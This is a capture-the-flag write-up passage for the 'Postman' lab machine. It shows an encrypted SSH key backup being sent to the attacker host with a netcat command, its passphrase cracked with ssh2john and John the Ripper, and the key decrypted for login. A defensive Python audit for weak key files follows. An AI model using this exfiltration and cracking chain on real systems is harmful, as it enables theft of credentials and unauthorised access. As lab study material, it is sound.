SSH Backup
redis@postman:/opt$ ll
total 12K
4.0K drwxr-xr-x 22 root root 4.0K Sep 30 2020 ..
4.0K drwxr-xr-x 2 root root 4.0K Sep 11 2019 .
4.0K -rwxr-xr-x 1 Matt Matt 1.8K Aug 26 2019 id_rsa.bak
After performing some basic enumeration, I came across what appears to be an SSH backup file, which was also detected by PEAS.
Judging by the ownership, it belongs to the Matt user.
redis@postman:/opt$ nc 10.10.16.8 2222 < ./id_rsa.bak
┌──(kali㉿kali)-[~/…/htb/labs/postman/ssh_backup]
└─$ nnc 2222 > id_rsa.bak
listening on [any] 2222 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.10.160] 56556
Transferring the backup file to Kali for further inspection
id_rsa.bak
┌──(kali㉿kali)-[~/…/htb/labs/postman/ssh_backup]
└─$ file id_rsa.bak
id_rsa.bak: PEM RSA private key
┌──(kali㉿kali)-[~/…/htb/labs/postman/ssh_backup]
└─$ cat id_rsa.bak
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C
-----END RSA PRIVATE KEY-----
Looking into the file content reveals that it's an encrypted RSA private key in PEM (Privacy-Enhanced Mail) format. While it's likely an SSH RSA key, judging by the filename, it is also very likely passphrase-protected, as the Proc-Type header shows ENCRYPTED.
However, it can easily be converted into a crack-able hashstring.
Password Cracking
┌──(kali㉿kali)-[~/…/htb/labs/postman/ssh_backup]
└─$ ssh2john ./id_rsa.bak > id_rsa.bak.hash
Converting the encrypted RSA key into a crack-able hashstring: id_rsa.bak.hash
┌──(kali㉿kali)-[~/…/htb/labs/postman/ssh_backup]
└─$ john ./id_rsa.bak.hash --wordlist=/usr/share/wordlists/rockyou.txt
using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008 (./id_rsa.bak)
1g 0:00:00:00 DONE (2023-10-05 13:36) 8.333g/s 2056Kp/s 2056Kc/s 2056KC/s container..comic
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Hashstring cracked
The passphrase for the encrypted RSA key is computer2008
Decryption
┌──(kali㉿kali)-[~/…/htb/labs/postman/ssh_backup]
└─$ openssl rsa -in id_rsa.bak -out id_rsa
Enter pass phrase for id_rsa.bak: computer2008
writing RSA key
Decrypting the encrypted RSA key with the cracked passphrase
┌──(kali㉿kali)-[~/…/htb/labs/postman/ssh_backup]
└─$ chmod 600 ./id_rsa
Restricting the permission bits of the decrypted SSH key to 600, since the SSH client refuses private keys that other users can read
┌──(kali㉿kali)-[~/…/htb/labs/postman/ssh_backup]
└─$ ll id_rsa
4.0K -rw------- 1 kali kali 1.7K Oct 5 13:41 id_rsa
Supposedly, this could now be used to authenticate to the target system as the Matt user via SSH
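From the defender's side, both conditions that exposed this key can be read without the passphrase: the mode bits in the directory listing and the legacy PEM header, which John reports as the MD5/3DES scheme. The Python audit below is an added example, not part of the original write-up; the function names, finding strings and the placeholder key body are assumptions.

```python
import base64
import os
import stat
import struct

# Constructed sample: header lines as shown on the page, placeholder body.
SAMPLE_LEGACY = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C

Q09OU1RSVUNURUQ=
-----END RSA PRIVATE KEY-----
"""

def classify_key(pem_text):
    """Return (container, protection) from a private key's PEM text alone."""
    lines = [ln.strip() for ln in pem_text.splitlines() if ln.strip()]
    if len(lines) < 2 or not lines[0].startswith("-----BEGIN "):
        return ("unknown", "unknown")
    label = lines[0][len("-----BEGIN "):].rstrip("-").strip()
    if label == "OPENSSH PRIVATE KEY":
        try:  # openssh-key-v1: magic, then length-prefixed ciphername, kdfname
            blob, off, fields = base64.b64decode("".join(lines[1:-1])), 15, []
            if not blob.startswith(b"openssh-key-v1\x00"):
                raise ValueError("bad magic")
            for _ in range(2):
                (n,) = struct.unpack(">I", blob[off:off + 4])
                fields.append(blob[off + 4:off + 4 + n].decode())
                off += 4 + n
        except (ValueError, struct.error):
            return ("openssh", "unknown")
        cipher, kdf = fields
        return ("openssh", "none" if cipher == "none" else f"{kdf}/{cipher}")
    if label in ("PRIVATE KEY", "ENCRYPTED PRIVATE KEY"):
        return ("pkcs8", "none" if label == "PRIVATE KEY" else "pbe")
    headers = dict(ln.split(":", 1) for ln in lines[1:-1] if ":" in ln)
    if "ENCRYPTED" in headers.get("Proc-Type", ""):
        cipher = headers.get("DEK-Info", "").split(",")[0].strip()
        return ("legacy-pem", f"md5-1round/{cipher}")
    return ("legacy-pem", "none")

def audit_key_file(path):
    """List findings for one key file: loose mode bits and weak protection."""
    findings, mode = [], stat.S_IMODE(os.stat(path).st_mode)
    if mode & 0o077:
        findings.append(f"mode {mode:o} lets group/other users access the key")
    with open(path, encoding="utf-8", errors="replace") as fh:
        container, protection = classify_key(fh.read())
    if protection == "none":
        findings.append("private key is stored without a passphrase")
    elif protection.startswith("md5-1round"):
        findings.append(f"{protection}: KDF is one MD5 round; re-encrypt in OpenSSH format")
    return findings
```

Run against a copy of the file with the mode from the listing (755), `audit_key_file` reports both the loose permissions and the single-round MD5 key derivation; a key saved in the OpenSSH format with a bcrypt KDF and mode 600 produces no findings.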